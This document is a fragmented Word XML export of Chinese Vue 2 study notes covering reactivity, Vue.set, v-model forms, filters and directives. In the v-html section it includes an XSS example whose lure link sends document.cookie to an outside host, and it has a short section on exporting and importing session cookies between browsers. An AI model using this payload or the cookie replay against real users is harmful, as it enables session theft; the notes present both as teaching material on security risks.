-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//判断一下是否需要排序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sortType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//使用sort方法进行排序，传入的是数组值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//返回后减前是降序，前减后是升序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sortType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//将结果返回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arr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更新数据时的一个问题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更新时的一个问题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"updateMei"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更新马冬梅的信息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"(p,index) of persons"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"p.id"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{{p.name}}-{{p.age}}-{{p.sex}}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'马冬梅'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'女'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'周冬雨'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'女'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'周杰伦'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'004'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'温兆伦'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updateMei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this.persons[0].name = '马老师' //奏效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this.persons[0].age = 50 //奏效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this.persons[0].sex = '男' //奏效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vue并没有为数组值提供修改属性的监测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this.persons[0] = {id:'001',name:'马老师',age:50,sex:'男'} //不奏效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//解决1，使用修改数组的js原生方法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//使用splice替换数组值，0是替换的起始索引，1是替换的个数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this.persons.splice(0,1,{id:'001',name:'马老师',age:50,sex:'男'})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//解决2，使用vm.$set方法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//第一个参数是要更改的数组对象，第二个参数是要更改的数组索引，第三个参数是要更改的值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'马老师'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b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Vue监测数据改变的原理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>—对象</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5259070" cy="3286760"/>
            <wp:effectExtent l="0" t="0" r="13970" b="5080"/>
            <wp:docPr id="9" name="图片 9" descr="a9ad88fa3bf9c9fee954feef4f6cb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9ad88fa3bf9c9fee954feef4f6cb8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模拟一个数据检测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//创建一个监视的实例对象，用于监视data中属性的变化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obs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Observer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//这里的obs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obs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//准备一个vm实例对象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_data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obs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_data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//将data值传入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Observer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//汇总对象中所有的属性形成一个数组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keys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Object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keys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//遍历数组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keys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//这里的this是Observer的实例对象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//为Observer的实例对象添加属性，属性名为数组的值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Object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defineProperty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//生成get方法，当获取k的值时调用，将获取的值返回，赋值给k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//生成set方法，当k的值改变时调用，将改变的值返回，赋值给k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${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}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被改了，我要去解析模板，生成虚拟DOM.....我要开始忙了`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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Vue.set的使用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Vue监测数据改变的原理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学校名称：{{school.name}}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学校地址：{{school.address}}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校长是：{{school.leader}}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"addSex"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添加一个性别属性，默认值是男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姓名：{{student.name}}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"student.sex"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性别：{{student.sex}}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年龄：真实{{student.age.rAge}}，对外{{student.age.sAge}}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朋友们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"(f,index) in student.friends"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{{f.name}}--{{f.age}}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friends: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'jerry'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'tony'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//vue中添加属性的方法，可监听到数据的改变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//第一个参数是要给谁添加属性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//第二个参数是添加什么属性(属性名)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//第三个参数是属性值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Vue.set(this.student,'sex','男')//set方法在vue身上，有局限，只能给data里面的属性添加属性，不能给data添加属性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'sex'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//$set方法在vue的实例对象身上，有局限，只能给data里面的属性添加属性，不能给data添加属性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t>Vue监测数据改变的原理_数组</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·vue对js数组原生的方法进行了包装</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·被vue管理的数组，调用数组方法时，调用的不在是Array原型对象中的方法，而是经过vue包装的方法</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·当调用数组方法改变数组值时，可以被vue监听到</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>总结数据监视</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·Vue监视数据的原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- vue会监视data中所有层次的数据。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·如何监测对象中的数据？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 通过setter实现监视，且要在new Vue时就传入要监测的数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 对象中后追加的属性，Vue默认不做响应式处理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 如需给后添加的属性做响应式，请使用如下API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Vue.set(target，propertyName/index，value) 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vm.$set(target，propertyName/index，value)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·如何监测数组中的数据？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 通过包裹数组更新元素的方法实现，本质就是做了两件事</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> 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调用原生对应的方法对数组进行更新</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  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重新解析模板，进而更新页面</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·在Vue修改数组中的某个元素一定要用如下方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 使用这些API:push()、pop()、shift()、unshift()、splice()、sort()、reverse()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- Vue.set() 或 vm.$set()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>                </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>· 特别注意</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- Vue.set() 和 vm.$set() 不能给vm 或 vm的根数据对象 添加属性！！！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·数据劫持</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 指的是在访问或者修改对象的某个属性时，通过一段代码拦截这个行为，进行额外的操作或者修改返回结果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 典型案例：数据双向绑定</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- vue 2.x 使用的是 Object.defineProperty()(Vue 在 3.x 版本之后改用 Proxy 进行实现)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 语法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- Object.defineProperty(obj,prop,descriptor)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总结数据监视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"student.age++"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年龄+1岁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"addSex"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添加性别属性，默认值：男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"student.sex = '未知' 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修改性别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"addFriend"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在列表首位添加一个朋友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"updateFirstFriendName"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修改第一个朋友的名字为：张三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"addHobby"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添加一个爱好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"updateHobby"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修改第一个爱好为：开车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"removeSmoke"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过滤掉爱好中的抽烟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姓名：{{student.name}}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年龄：{{student.age}}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"student.sex"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性别：{{student.sex}}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爱好：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"(h,index) in student.hobby"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{{h}}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朋友们：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"(f,index) in student.friends"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"index"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{{f.name}}--{{f.age}}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hobby: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'抽烟'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'喝酒'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'烫头'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friends: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'jerry'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'tony'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//给学生属性添加性别属性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Vue.set(this.student,'sex','男')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'sex'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//在列表首位添加一位朋友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addFriend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friends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'jack'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70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//更新第一位朋友的姓名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updateFirstFriendName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friends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//在数组最后添加爱好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addHobby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hobby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push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'学习'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//修改第一个爱好为开车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updateHobby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this.student.hobby.splice(0,1,'开车')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Vue.set(this.student.hobby,0,'开车')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hobby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'开车'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//删除抽烟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removeSmoke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hobby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hobby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'抽烟'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收集表单数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·若：&lt;input type="text"/&gt;，则v-model收集的是value值，用户输入的就是value值</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·若：&lt;input type="radio"/&gt;，则v-model收集的是value值，且要给标签配置value值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·若：&lt;input type="checkbox"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 没有配置input的value属性，那么收集的就是checked（勾选 or 未勾选，是布尔值）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 配置input的value属性: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v-model的初始值是非数组，那么收集的就是checked（勾选 or 未勾选，是布尔值）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v-model的初始值是数组，那么收集的的就是value组成的数组</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·备注：v-model的三个修饰符</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- lazy：失去焦点再收集数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- number：输入字符串转为有效的数字</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- trim：输入首尾空格过滤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3609975" cy="4575175"/>
            <wp:effectExtent l="0" t="0" r="1905" b="12065"/>
            <wp:docPr id="4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收集表单数据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prevent阻止表单提交默认行为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@submit.prevent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trim：输入首尾空格过滤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账号：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v-model.trim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"userInfo.account"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密码：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"password"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"userInfo.password"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type="number"，v-model.number将年龄的数据类型设置为数值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年龄：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"number"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v-model.number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"userInfo.age"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&lt;!--v-model收集的是value值，要给标签配置value值--&gt;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性别：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男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"radio"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"sex"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"userInfo.sex"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"male"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女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"radio"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"sex"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"userInfo.sex"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"female"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配置input的value属性，将v-model的初始值变为数组，收集到value组成的数组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爱好：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学习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"userInfo.hobby"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打游戏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"userInfo.hobby"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"game"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吃饭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"userInfo.hobby"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"eat"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所属校区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"userInfo.city"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请选择校区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"beijing"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北京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"shanghai"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上海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"shenzhen"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深圳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"wuhan"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武汉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其他信息：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lazy：输入框失去焦点再收集数据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textarea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v-model.lazy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"userInfo.other"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textarea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没有配置input的value属性，那么收集的就是checked（勾选 or 未勾选，是布尔值）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"userInfo.agree"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阅读并接受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《用户协议》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提交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form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userInfo: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account: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password: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'female'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//设置默认性别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hobby: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[],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//将多选框改成数组类型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city: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'beijing'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//设置默认选项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other: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agree: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//将数据转成json数据并输出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2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过滤器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·功能:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 要显示的数据进行特定格式化后再显示（适用于一些简单逻辑的处理）</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·语法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 注册过滤器：Vue.filter(name,callback) 或 new Vue{filters:{}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 使用过滤器：{{ xxx | 过滤器名}}  或  v-bind:属性 = "xxx | 过滤器名"</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·备注</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 过滤器也可以接收额外参数、多个过滤器也可以串联</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 并没有改变原本的数据, 是产生新的对应的数据</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·效果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2453005" cy="1432560"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="4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·引入外部js，选择其中一个即可</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- moment.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- day.js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过滤器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"https://cdn.bootcdn.net/ajax/libs/dayjs/1.10.6/dayjs.min.js"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显示格式化后的时间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计算属性实现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现在是1：{{fmtTime}}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methods实现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现在是2：{{getFmtTime()}}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过滤器实现，第一个是要展示的数据，第二个是过滤器名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现在是3：{{time | timeFormater}}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过滤器实现（传参）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现在是4：{{time | timeFormater('YYYY-MM-DD')}}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多个过滤器也可以串联，依次传递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现在是5：{{time | timeFormater('YYYY-MM-DD') | mySlice}}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使用全局过滤器过滤msg赋值给x属性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"msg | mySlice"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尚硅谷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&lt;!--使用全局过滤器--&gt;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{{msg | mySlice}}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//全局过滤器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'mySlice'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1621561377603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//时间戳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'你好，尚硅谷'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fmtTime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//格式化时间戳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dayjs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format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'YYYY年MM月DD日 HH:mm:ss'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getFmtTime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dayjs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format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'YYYY年MM月DD日 HH:mm:ss'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//局部过滤器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filters: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timeFormater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'YYYY年MM月DD日 HH:mm:ss'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console.log('@',value)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dayjs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format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mySlice(value){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return value.slice(0,4)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'hello,atguigu!'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宋体" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pP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内置指令与自定义指令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常用内置指令</w:t>
      </w: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·v-text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更新元素的 textContent，向其所在的节点中渲染文本内容。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与插值语法的区别</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420"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-- v-text会替换掉节点中的内容，{{xx}}则不会。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·v-html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更新元素的 innerHTML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·v-if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如果为true, 当前标签才会输出到页面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·v-else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如果为false, 当前标签才会输出到页面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·v-show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通过控制display 样式来控制显示/隐藏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·v-for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遍历数组/对象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·v-on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绑定事件监听, 一般简写为@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·v-bind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绑定解析表达式, 可以省略v-bind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·v-model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双向数据绑定</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pP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t>·v-cloak</w:t>
      </w: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</w:rPr>
        <w:t>- 防止闪现, 与css 配合: [v-cloak] { display: none }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v-text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v-text指令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你好，{{name}}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"name"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'&lt;h3&gt;你好啊！&lt;/h3&gt;'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cookie入狱教程</w:t>
      </w:r>
    </w:p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15" name="图片 15" descr="1be152b9adff9f77a71b0d6a4625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be152b9adff9f77a71b0d6a46258c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·安装cookie-editor浏览器插件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·登录某个网站</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·打开cookie-editor插件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·点击export按钮导出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·打开其他浏览器，进入某个网站</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·打开cookie-editor插件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·点击import按钮导出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·将内容粘贴到输入框导入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2583815"/>
            <wp:effectExtent l="0" t="0" r="635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·刷新即可登录成功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v-html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·向指定节点中渲染包含html结构的内容。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·与插值语法的区别：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- v-html会替换掉节点中所有的内容，{{xx}}则不会</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- v-html可以识别html结构</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·严重注意：v-html有安全性问题！！！！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 在网站上动态渲染任意HTML是非常危险的，容易导致XSS攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 一定要在可信的内容上使用v-html，永不要用在用户提交的内容上！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v-html指令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你好，{{name}}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v-html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v-html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"str2"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str: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'&lt;h3&gt;你好啊！&lt;/h3&gt;'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document.cookie获取网站的cookie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str2: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'&lt;a href=javascript:location.href="http://www.baidu.com?"+document.cookie&gt;兄弟我找到你想要的资源了，快来！&lt;/a&gt;'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v-cloak</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·本质是一个特殊属性，Vue实例创建完毕并接管容器后，会删掉v-cloak属性。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·使用css配合v-cloak可以解决网速慢时页面展示出{{xxx}}的问题。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v-cloak指令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[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v-cloak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v-cloak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"http://localhost:8080/resource/5s/vue.js"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pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v-once</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·v-once所在节点在初次动态渲染后，就视为静态内容了</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·以后数据的改变不会引起v-once所在结构的更新，可以用于优化性能。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v-once指令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v-once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初始化的n值是:{{n}}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当前的n值是:{{n}}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点我n+1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v-pre</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·跳过其所在节点的编译过程</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·可利用它跳过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 没有使用指令语法、没有使用插值语法的节点，会加快编译</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/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v-pre指令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v-pre指令：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1.跳过其所在节点的编译过程。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2.可利用它跳过：没有使用指令语法、没有使用插值语法的节点，会加快编译。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v-pre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Vue其实很简单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当前的n值是:{{n}}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点我n+1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pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>回顾一个DOM操作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点我创建一个输入框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getElementById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'btn'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//创建一个input标签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createElement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'input'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//设置class值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'demo'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//设置value值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99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//设置点击事件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//将标签添加到页面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appendChild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//获取input焦点，只能在元素添加到页面后使用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//获取父元素，只能在元素添加到页面后使用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input.parentElement.style.backgroundColor = 'skyblue'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parentElement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自定义指令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·局部指令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-new Vue({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directives:{指令名:配置对象}   </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>directives{指令名:回调函数}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}) </w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·全局指令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- Vue.directive(指令名,配置对象) 或   Vue.directive(指令名,回调函数)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·配置对象中常用的3个回调</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
